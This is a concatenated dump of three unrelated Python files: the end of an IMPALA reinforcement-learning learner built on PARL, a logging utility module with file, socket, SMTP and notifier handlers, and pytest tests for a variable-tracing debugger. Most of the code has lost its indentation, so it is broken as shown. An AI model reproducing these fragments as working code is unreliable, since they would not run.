self.sample_total_steps = 0
self.create_actors()
def learn_data_provider(self):
""" Data generator for fluid.layers.py_reader
"""
while True:
sample_data = self.sample_data_queue.get()
self.sample_total_steps += sample_data['obs'].shape[0]
self.batch_buffer.append(sample_data)
buffer_size = sum(
[data['obs'].shape[0] for data in self.batch_buffer])
if buffer_size >= self.config['train_batch_size']:
batch = {}
for key in self.batch_buffer[0].keys():
batch[key] = np.concatenate(
[data[key] for data in self.batch_buffer])
self.batch_buffer = []
obs_np = batch['obs'].astype('float32')
actions_np = batch['actions'].astype('int64')
behaviour_logits_np = batch['behaviour_logits'].astype(
'float32')
rewards_np = batch['rewards'].astype('float32')
dones_np = batch['dones'].astype('float32')
self.lr = self.lr_scheduler.step()
self.entropy_coeff = self.entropy_coeff_scheduler.step()
yield [
obs_np, actions_np, behaviour_logits_np, rewards_np,
dones_np, self.lr, self.entropy_coeff
]
def run_learn(self):
""" Learn loop
"""
while True:
with self.learn_time_stat:
total_loss, pi_loss, vf_loss, entropy, kl = self.agent.learn()
self.params_updated = True
self.total_loss_stat.add(total_loss)
self.pi_loss_stat.add(pi_loss)
self.vf_loss_stat.add(vf_loss)
self.entropy_stat.add(entropy)
self.kl_stat.add(kl)
def create_actors(self):
""" Connect to the cluster and start sampling of the remote actor.
"""
parl.connect(self.config['master_address'])
logger.info('Waiting for {} remote actors to connect.'.format(
self.config['actor_num']))
for i in range(self.config['actor_num']):
self.remote_count += 1
logger.info('Remote actor count: {}'.format(self.remote_count))
if self.start_time is None:
self.start_time = time.time()
remote_thread = threading.Thread(target=self.run_remote_sample)
            remote_thread.daemon = True
remote_thread.start()
def run_remote_sample(self):
""" Sample data from remote actor and update parameters of remote actor.
"""
remote_actor = Actor(self.config)
cnt = 0
remote_actor.set_weights(self.cache_params)
while True:
batch = remote_actor.sample()
self.sample_data_queue.put(batch)
cnt += 1
if cnt % self.config['get_remote_metrics_interval'] == 0:
metrics = remote_actor.get_metrics()
if metrics:
self.remote_metrics_queue.put(metrics)
            with self.params_lock:
                if self.params_updated and self.cache_params_sent_cnt >= self.config[
                        'params_broadcast_interval']:
                    self.params_updated = False
                    self.cache_params = self.agent.get_weights()
                    self.cache_params_sent_cnt = 0
                self.cache_params_sent_cnt += 1
                self.total_params_sync += 1
remote_actor.set_weights(self.cache_params)
def log_metrics(self):
""" Log metrics of learner and actors
"""
if self.start_time is None:
return
metrics = []
while True:
try:
metric = self.remote_metrics_queue.get_nowait()
metrics.append(metric)
except queue.Empty:
break
episode_rewards, episode_steps = [], []
for x in metrics:
episode_rewards.extend(x['episode_rewards'])
episode_steps.extend(x['episode_steps'])
max_episode_rewards, mean_episode_rewards, min_episode_rewards, \
max_episode_steps, mean_episode_steps, min_episode_steps =\
None, None, None, None, None, None
if episode_rewards:
mean_episode_rewards = np.mean(np.array(episode_rewards).flatten())
max_episode_rewards = np.max(np.array(episode_rewards).flatten())
min_episode_rewards = np.min(np.array(episode_rewards).flatten())
mean_episode_steps = np.mean(np.array(episode_steps).flatten())
max_episode_steps = np.max(np.array(episode_steps).flatten())
min_episode_steps = np.min(np.array(episode_steps).flatten())
metric = {
'Sample steps': self.sample_total_steps,
'max_episode_rewards': max_episode_rewards,
'mean_episode_rewards': mean_episode_rewards,
'min_episode_rewards': min_episode_rewards,
'max_episode_steps': max_episode_steps,
'mean_episode_steps': mean_episode_steps,
'min_episode_steps': min_episode_steps,
'sample_queue_size': self.sample_data_queue.qsize(),
'total_params_sync': self.total_params_sync,
'cache_params_sent_cnt': self.cache_params_sent_cnt,
'total_loss': self.total_loss_stat.mean,
'pi_loss': self.pi_loss_stat.mean,
'vf_loss': self.vf_loss_stat.mean,
'entropy': self.entropy_stat.mean,
'kl': self.kl_stat.mean,
'learn_time_s': self.learn_time_stat.mean,
'elapsed_time_s': int(time.time() - self.start_time),
'lr': self.lr,
'entropy_coeff': self.entropy_coeff,
}
for key, value in metric.items():
if value is not None:
tensorboard.add_scalar(key, value, self.sample_total_steps)
logger.info(metric)
if __name__ == '__main__':
from impala_config import config
learner = Learner(config)
assert config['log_metrics_interval_s'] > 0
while True:
time.sleep(config['log_metrics_interval_s'])
learner.log_metrics()
|
logger.py
|
import sys
import logging.handlers
import platform
import threading
import traceback
from . import compat
from . import handlers
try:
import notifiers.logging
_has_notifiers = True
except (ImportError, ModuleNotFoundError):
_has_notifiers = False
# register module-level functions for all supported notifiers
def _construct_notifier_func(provider_name):
def wrapper(level, **defaults):
if not _has_notifiers:
raise RuntimeError("the Notifiers package, required for the requested handler ("+provider_name+"), was not found. Make sure it is installed")
return add_handler(notifiers.logging.NotificationHandler, level, provider_name, defaults)
globals()["log_to_"+provider_name] = wrapper
wrapper.__name__ = "log_to_" + provider_name
wrapper.__doc__ = f"""Initializes a handler to send {provider_name} notifications for the requested level.
see the Notifiers docs for more info (including required parameters) at
https://notifiers.readthedocs.io/en/latest/providers/index.html"""
if _has_notifiers:
for provider in notifiers.all_providers():
# Mailgun support is currently implemented through another module
# as well as in Notifiers, and is thus excluded here
if provider == "mailgun":
continue
_construct_notifier_func(provider)
log = logging.getLogger()
DEFAULT_FMT = "%(levelname)s %(name)s - %(module)s.%(funcName)s (%(asctime)s) - %(threadName)s (%(thread)d):\n%(message)s"
DEFAULT_DATEFMT = "%Y-%m-%d %H:%M:%S"
exc_callback = None
def set_level(level, logger=None):
"""
Convenience function to set the logging level of the root (or optionally a custom) logger.
level must be an int or str
"""
if not logger:
logger = log
logger.setLevel(level)
def add_handler(cls, level, *args, **kwargs):
"""Add a handler to the route logger.
note: This function is only meant to be used when adding support for one shot invocation of new handlers.
In all other cases, you want log_to_*
args:
cls (subclass of logging.Handler): The handler class that is to be instantiated
level (int or str): The logging level (must be predefined)
args (list): Arguments that are to be passed to the handler
kwargs (dict): In all but a few cases, these keyword arguments are passed to the handler during initialization.
The following parameters may be specified for further customization and are subsequently not directly passed along.
fmt: the log formatter
datefmt: specify a specialized date format
returns:
logging.Handler
"""
fmt = kwargs.get("fmt")
datefmt = kwargs.get("datefmt")
if "fmt" in kwargs:
del kwargs["fmt"]
if "datefmt" in kwargs:
del kwargs["datefmt"]
fmt = fmt or DEFAULT_FMT
datefmt = datefmt or DEFAULT_DATEFMT
handler = cls(*args, **kwargs)
handler.setLevel(level)
formatter = logging.Formatter(fmt, datefmt)
handler.setFormatter(formatter)
log.addHandler(handler)
return handler
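# Usage sketch (illustrative): add_handler() wiring up a stock MemoryHandler with
# a custom format. The capacity, level and format below are example values only.
def _example_custom_handler():
    return add_handler(
        logging.handlers.MemoryHandler, logging.WARNING,
        capacity=100,
        fmt="%(asctime)s %(levelname)s %(message)s",
        datefmt="%H:%M:%S",
    )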
def log_to_stream(level, stream=None, *args, **kwargs):
return add_handler(logging.StreamHandler, level, stream=stream, *args, **kwargs)
def log_to_file(level, filename, *args, **kwargs):
return add_handler(logging.FileHandler, level, filename=filename, *args, **kwargs)
def log_to_rotating_file(level, filename, maxBytes=0, backupCount=0, *args, **kwargs):
return add_handler(logging.handlers.RotatingFileHandler, level, filename=filename, maxBytes=maxBytes, backupCount=backupCount, *args, **kwargs)
def log_to_timed_rotating_file(level, filename, when="h", interval=1, backupCount=0, *args, **kwargs):
return add_handler(logging.handlers.TimedRotatingFileHandler, level, filename=filename, when=when, interval=interval, backupCount=backupCount, *args, **kwargs)
def log_to_socket(level, host, port, *args, **kwargs):
return add_handler(logging.handlers.SocketHandler, level, host=host, port=port, *args, **kwargs)
def log_to_smtp(level, mailhost, fromaddr, toaddrs, subject, credentials=None, *args, **kwargs):
return add_handler(logging.handlers.SMTPHandler, level, mailhost=mailhost, fromaddr=fromaddr, toaddrs=toaddrs, subject=subject, credentials=credentials, *args, **kwargs)
def log_to_prowl(level, api_key, app_name, event, *args, **kwargs):
return add_handler(handlers.ProwlHandler, level, api_key=api_key, app_name=app_name, event=event, *args, **kwargs)
def log_to_mailgun(level, api_key, sender, to, subject=None, domain=None, *args, **kwargs):
# attempt parsing a domain from the sender
# if none was specified
if not domain:
if not ("<" in sender and ">" in sender):
return
domain = sender[sender.find("@"):sender.find(">")][1:]
return add_handler(handlers.MailgunHandler, level, api_key=api_key, domain=domain, sender=sender, to=to, subject=subject, *args, **kwargs)
def log_to_notifier(level, provider, defaults={}):
if not _has_notifiers:
log.warning("Attempted to register a third-party notification handler, but the notifiers package could not be found")
return
return add_handler(notifiers.logging.NotificationHandler, level, provider, defaults)
def _excepthook(exctype, value, traceback):
# ignore Ctrl+C in console applications
if issubclass(exctype, KeyboardInterrupt):
sys.__excepthook__(exctype, value, traceback)
return
# silently ignore SystemExit
if issubclass(exctype, SystemExit):
return
# fixme: all unhandled exceptions rightly report logger._excepthook as caller
# when it would actually be preferable to point to the erroneous module and funcname itself
log.error("Unhandled exception", exc_info=(exctype, value, traceback))
if callable(exc_callback):
exc_callback(exctype, value, traceback)
def _threaded_excepthook(args):
# ignore Ctrl+C in console applications
if issubclass(args.exc_type, KeyboardInterrupt):
return
# silently ignore SystemExit
if issubclass(args.exc_type, SystemExit):
return
# fixme: all unhandled exceptions rightly report logger._excepthook as caller
# when it would actually be preferable to point to the erroneous module and funcname itself
log.error("Unhandled exception", exc_info=(args.exc_type, args.exc_value, args.exc_traceback))
def log_unhandled_exceptions(callback=None):
"""Start logging all unhandled exceptions to registered handlers >= logging.ERROR.
If a callback function is specified it will be called every time an exception is processed, with parameters (exctype, value, traceback)
Typically used to notify other parts of the application (UI) or exit altogether.
"""
global exc_callback
if callback and callable(callback):
exc_callback = callback
sys.excepthook = _excepthook
def log_threaded_exceptions():
"""Start logging unhandled exceptions in threads other than the main one."""
threading.excepthook = _threaded_excepthook
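# Usage sketch (illustrative): installing both exception hooks with a callback
# that lets the application react before exiting. The callback body is an
# example assumption only.
def _example_install_hooks():
    def on_unhandled(exctype, value, tb):
        # e.g. notify the UI or flush buffers here, then bail out
        sys.exit(1)
    log_unhandled_exceptions(on_unhandled)
    log_threaded_exceptions()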
def log_debug_info(level=logging.INFO):
log.log(level, "python version %s", sys.version)
log.log(level, "running on %s version %s", platform.system(), platform.version())
def init():
set_level(logging.DEBUG)
log_to_stream(logging.DEBUG)
log_to_file(logging.ERROR, "errors.log")
log_unhandled_exceptions()
log_threaded_exceptions()
log.debug("Initialized logging subsystem")
log_debug_info()
def shutdown():
logging.shutdown()
if __name__ == "__main__":
def error():
log.info("working on something")
0/0
import time
init()
#t = threading.Thread(target=error, daemon=True)
#t.start()
error()
time.sleep(0.5)
|
test_seeker.py
|
# Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
import io
import textwrap
import threading
import time
import sys
from executor.seeker.utils import truncate
import pytest
from executor import seeker
from executor.seeker.variables import needs_parentheses
from .utils import (
assert_output,
assert_sample_output,
VariableEntry,
CallEntry,
LineEntry,
ReturnEntry,
ReturnValueEntry,
ExceptionEntry,
ExceptionValueEntry,
SourcePathEntry,
CallEndedByExceptionEntry,
ElapsedTimeEntry,
)
from . import mini_toolbox
from importlib import import_module
@pytest.fixture()
def long_arr_value():
return (
"[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, "
"26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, "
"50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, "
"74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, "
"98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, "
"117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, "
"136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, "
"155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, "
"174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, "
"193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, "
"212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, "
"231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, "
"250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, "
"269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, "
"288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, "
"307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, "
"326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, "
"345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, "
"364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, "
"383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, "
"402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, "
"421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, "
"440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, "
"459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, "
"478, 479, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 490, 491, 492, 493, 494, 495, 496, "
"497, 498, 499, 500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515, "
"516, 517, 518, 519, 520, 521, 522, 523, 524, 525, 526, 527, 528, 529, 530, 531, 532, 533, 534, "
"535, 536, 537, 538, 539, 540, 541, 542, 543, 544, 545, 546, 547, 548, 549, 550, 551, 552, 553, "
"554, 555, 556, 557, 558, 559, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 570, 571, 572, "
"573, 574, 575, 576, 577, 578, 579, 580, 581, 582, 583, 584, 585, 586, 587, 588, 589, 590, 591, "
"592, 593, 594, 595, 596, 597, 598, 599, 600, 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, "
"611, 612, 613, 614, 615, 616, 617, 618, 619, 620, 621, 622, 623, 624, 625, 626, 627, 628, 629, "
"630, 631, 632, 633, 634, 635, 636, 637, 638, 639, 640, 641, 642, 643, 644, 645, 646, 647, 648, "
"649, 650, 651, 652, 653, 654, 655, 656, 657, 658, 659, 660, 661, 662, 663, 664, 665, 666, 667, "
"668, 669, 670, 671, 672, 673, 674, 675, 676, 677, 678, 679, 680, 681, 682, 683, 684, 685, 686, "
"687, 688, 689, 690, 691, 692, 693, 694, 695, 696, 697, 698, 699, 700, 701, 702, 703, 704, 705, "
"706, 707, 708, 709, 710, 711, 712, 713, 714, 715, 716, 717, 718, 719, 720, 721, 722, 723, 724, "
"725, 726, 727, 728, 729, 730, 731, 732, 733, 734, 735, 736, 737, 738, 739, 740, 741, 742, 743, "
"744, 745, 746, 747, 748, 749, 750, 751, 752, 753, 754, 755, 756, 757, 758, 759, 760, 761, 762, "
"763, 764, 765, 766, 767, 768, 769, 770, 771, 772, 773, 774, 775, 776, 777, 778, 779, 780, 781, "
"782, 783, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 794, 795, 796, 797, 798, 799, 800, "
"801, 802, 803, 804, 805, 806, 807, 808, 809, 810, 811, 812, 813, 814, 815, 816, 817, 818, 819, "
"820, 821, 822, 823, 824, 825, 826, 827, 828, 829, 830, 831, 832, 833, 834, 835, 836, 837, 838, "
"839, 840, 841, 842, 843, 844, 845, 846, 847, 848, 849, 850, 851, 852, 853, 854, 855, 856, 857, "
"858, 859, 860, 861, 862, 863, 864, 865, 866, 867, 868, 869, 870, 871, 872, 873, 874, 875, 876, "
"877, 878, 879, 880, 881, 882, 883, 884, 885, 886, 887, 888, 889, 890, 891, 892, 893, 894, 895, "
"896, 897, 898, 899, 900, 901, 902, 903, 904, 905, 906, 907, 908, 909, 910, 911, 912, 913, 914, "
"915, 916, 917, 918, 919, 920, 921, 922, 923, 924, 925, 926, 927, 928, 929, 930, 931, 932, 933, "
"934, 935, 936, 937, 938, 939, 940, 941, 942, 943, 944, 945, 946, 947, 948, 949, 950, 951, 952, "
"953, 954, 955, 956, 957, 958, 959, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 970, 971, "
"972, 973, 974, 975, 976, 977, 978, 979, 980, 981, 982, 983, 984, 985, 986, 987, 988, 989, 990, "
"991, 992, 993, 994, 995, 996, 997, 998, 999]"
)
def test_string_io_no_watch():
string_io = io.StringIO()
@seeker.tracer(output=string_io)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
LineEntry("y = 8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_string_io_one_entry():
string_io = io.StringIO()
@seeker.tracer("foo", output=string_io)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
LineEntry("y = 8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_string_io_multiple_entries():
string_io = io.StringIO()
@seeker.tracer("foo", "x", "y", output=string_io)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_callable_watch_all():
string_io = io.StringIO()
def write(msg):
string_io.write(msg)
@seeker.tracer(only_watch=False, output=write)
def my_function(foo):
x = 7
y = 9
return y + x
result = my_function("beebeebooboo")
assert result == 16
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'beebeebooboo'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 9"),
VariableEntry("y", "9"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("16"),
ElapsedTimeEntry(),
),
)
def test_relative_time():
snoop = seeker.tracer(only_watch=False, relative_time=True)
def foo(x):
if x == 0:
bar1(x)
qux()
return
with snoop:
# There should be line entries for these three lines,
# no line entries for anything else in this function,
# but calls to all bar functions should be traced
foo(x - 1)
bar2(x)
qux()
int(4)
bar3(9)
return x
@snoop
def bar1(_x):
qux()
@snoop
def bar2(_x):
qux()
@snoop
def bar3(_x):
qux()
def qux():
time.sleep(0.1)
return 9 # not traced, mustn't show up
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = foo(2)
assert result == 2
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
# In first with
SourcePathEntry(),
VariableEntry("x", "2"),
VariableEntry("bar1"),
VariableEntry("bar2"),
VariableEntry("bar3"),
VariableEntry("foo"),
VariableEntry("qux"),
VariableEntry("snoop"),
LineEntry("foo(x - 1)"),
# In with in recursive call
VariableEntry("x", "1"),
VariableEntry("bar1"),
VariableEntry("bar2"),
VariableEntry("bar3"),
VariableEntry("foo"),
VariableEntry("qux"),
VariableEntry("snoop"),
LineEntry("foo(x - 1)"),
# Call to bar1 from if block outside with
VariableEntry("_x", "0"),
VariableEntry("qux"),
CallEntry("def bar1(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(0.1),
# In with in recursive call
LineEntry("bar2(x)"),
# Call to bar2 from within with
VariableEntry("_x", "1"),
VariableEntry("qux"),
CallEntry("def bar2(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(0.1),
# In with in recursive call
LineEntry("qux()"),
LineEntry(source_regex="with snoop:", min_python_version=(3, 10)),
ElapsedTimeEntry(0.4),
# Call to bar3 from after with
VariableEntry("_x", "9"),
VariableEntry("qux"),
CallEntry("def bar3(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(0.1),
# -- Similar to previous few sections,
# -- but from first call to foo
# In with in first call
LineEntry("bar2(x)"),
# Call to bar2 from within with
VariableEntry("_x", "2"),
VariableEntry("qux"),
CallEntry("def bar2(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(0.1),
# In with in first call
LineEntry("qux()"),
LineEntry(source_regex="with snoop:", min_python_version=(3, 10)),
ElapsedTimeEntry(0.7),
# Call to bar3 from after with
VariableEntry("_x", "9"),
VariableEntry("qux"),
CallEntry("def bar3(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(0.1),
),
)
def test_thread_info():
@seeker.tracer(only_watch=False, thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function("baba")
assert result == 15
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_multi_thread_info():
@seeker.tracer(only_watch=False, thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
def parse_call_content(line):
return line.split("{event:9} ".format(event="call"))[-1]
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
my_function("baba")
t1 = threading.Thread(target=my_function, name="test123", args=["bubu"])
t1.start()
t1.join()
t1 = threading.Thread(target=my_function, name="bibi", args=["bibi"])
t1.start()
t1.join()
output = output_capturer.string_io.getvalue()
calls = [line for line in output.split("\n") if "call" in line]
main_thread = calls[0]
assert parse_call_content(main_thread) == parse_call_content(calls[1])
assert parse_call_content(main_thread) == parse_call_content(calls[2])
thread_info_regex = "([0-9]+-{name}+[ ]+)"
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry(
"def my_function(foo):",
thread_info_regex=thread_info_regex.format(name="MainThread"),
),
LineEntry(
"x = 7", thread_info_regex=thread_info_regex.format(name="MainThread")
),
VariableEntry("x", "7"),
LineEntry(
"y = 8", thread_info_regex=thread_info_regex.format(name="MainThread")
),
VariableEntry("y", "8"),
LineEntry(
"return y + x",
thread_info_regex=thread_info_regex.format(name="MainThread"),
),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
VariableEntry("foo", value_regex="u?'bubu'"),
CallEntry(
"def my_function(foo):",
thread_info_regex=thread_info_regex.format(name="test123"),
),
LineEntry(
"x = 7", thread_info_regex=thread_info_regex.format(name="test123")
),
VariableEntry("x", "7"),
LineEntry(
"y = 8", thread_info_regex=thread_info_regex.format(name="test123")
),
VariableEntry("y", "8"),
LineEntry(
"return y + x",
thread_info_regex=thread_info_regex.format(name="test123"),
),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
VariableEntry("foo", value_regex="u?'bibi'"),
CallEntry(
"def my_function(foo):",
thread_info_regex=thread_info_regex.format(name="bibi"),
),
LineEntry("x = 7", thread_info_regex=thread_info_regex.format(name="bibi")),
VariableEntry("x", "7"),
LineEntry("y = 8", thread_info_regex=thread_info_regex.format(name="bibi")),
VariableEntry("y", "8"),
LineEntry(
"return y + x", thread_info_regex=thread_info_regex.format(name="bibi")
),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_watch_only():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@seeker.tracer(
"foo.x",
"io.__name__",
'len(foo.__dict__["x"] * "abc")',
)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("io.__name__", "'io'"),
CallEntry("def my_function():"),
LineEntry("foo = Foo()"),
VariableEntry("foo.x", "2"),
VariableEntry('len(foo.__dict__["x"] * "abc")', "6"),
LineEntry(),
LineEntry(),
VariableEntry("foo.x", "4"),
VariableEntry('len(foo.__dict__["x"] * "abc")', "12"),
LineEntry(),
LineEntry(),
VariableEntry("foo.x", "16"),
VariableEntry('len(foo.__dict__["x"] * "abc")', "48"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_watch_all():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@seeker.tracer(
"foo.x",
"io.__name__",
'len(foo.__dict__["x"] * "abc")',
only_watch=False,
)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("Foo"),
VariableEntry("io.__name__", "'io'"),
CallEntry("def my_function():"),
LineEntry("foo = Foo()"),
VariableEntry("foo"),
VariableEntry("foo.x", "2"),
VariableEntry('len(foo.__dict__["x"] * "abc")', "6"),
LineEntry(),
VariableEntry("i", "0"),
LineEntry(),
VariableEntry("foo.x", "4"),
VariableEntry('len(foo.__dict__["x"] * "abc")', "12"),
LineEntry(),
VariableEntry("i", "1"),
LineEntry(),
VariableEntry("foo.x", "16"),
VariableEntry('len(foo.__dict__["x"] * "abc")', "48"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_watch_explode_only():
class Foo:
def __init__(self, x, y):
self.x = x
self.y = y
# thoughts: what is lst + []?
@seeker.tracer(watch_explode=("_d", "_point", "lst"))
def my_function():
_d = {"a": 1, "b": 2, "c": "ignore"}
_point = Foo(x=3, y=4)
lst = [7, 8, 9]
lst.append(10)
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry(),
VariableEntry("_d"),
VariableEntry("_d['a']", "1"),
VariableEntry("_d['b']", "2"),
VariableEntry("_d['c']", "'ignore'"),
LineEntry(),
VariableEntry("_point"),
VariableEntry("_point.x", "3"),
VariableEntry("_point.y", "4"),
LineEntry(),
VariableEntry("lst"),
VariableEntry("lst[0]", "7"),
VariableEntry("lst[1]", "8"),
VariableEntry("lst[2]", "9"),
# VariableEntry('lst'),
LineEntry(),
VariableEntry("lst"),
VariableEntry("lst[3]", "10"),
# VariableEntry('lst'),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_watch_explode_with_others():
class Foo:
def __init__(self, x, y):
self.x = x
self.y = y
@seeker.tracer(watch_explode=("_d", "_point", "lst + []"), only_watch=False)
def my_function():
_d = {"a": 1, "b": 2, "c": "ignore"}
_point = Foo(x=3, y=4)
lst = [7, 8, 9]
lst.append(10)
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("Foo"),
CallEntry("def my_function():"),
LineEntry(),
VariableEntry("_d"),
VariableEntry("_d['a']", "1"),
VariableEntry("_d['b']", "2"),
VariableEntry("_d['c']", "'ignore'"),
LineEntry(),
VariableEntry("_point"),
VariableEntry("_point.x", "3"),
VariableEntry("_point.y", "4"),
LineEntry(),
VariableEntry("lst"),
VariableEntry("(lst + [])[0]", "7"),
VariableEntry("(lst + [])[1]", "8"),
VariableEntry("(lst + [])[2]", "9"),
VariableEntry("lst + []"),
LineEntry(),
VariableEntry("lst"),
VariableEntry("(lst + [])[3]", "10"),
VariableEntry("lst + []"),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_variables_classes_only():
class WithSlots(object):
__slots__ = ("x", "y")
def __init__(self):
self.x = 3
self.y = 4
@seeker.tracer(
seeker.Keys("_d", exclude="c"),
seeker.Attrs("_d"), # doesn't have attributes
seeker.Attrs("_s"),
seeker.Indices("_lst")[-3:],
)
def my_function():
_d = {"a": 1, "b": 2, "c": "ignore"}
_s = WithSlots()
_lst = list(range(1000))
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
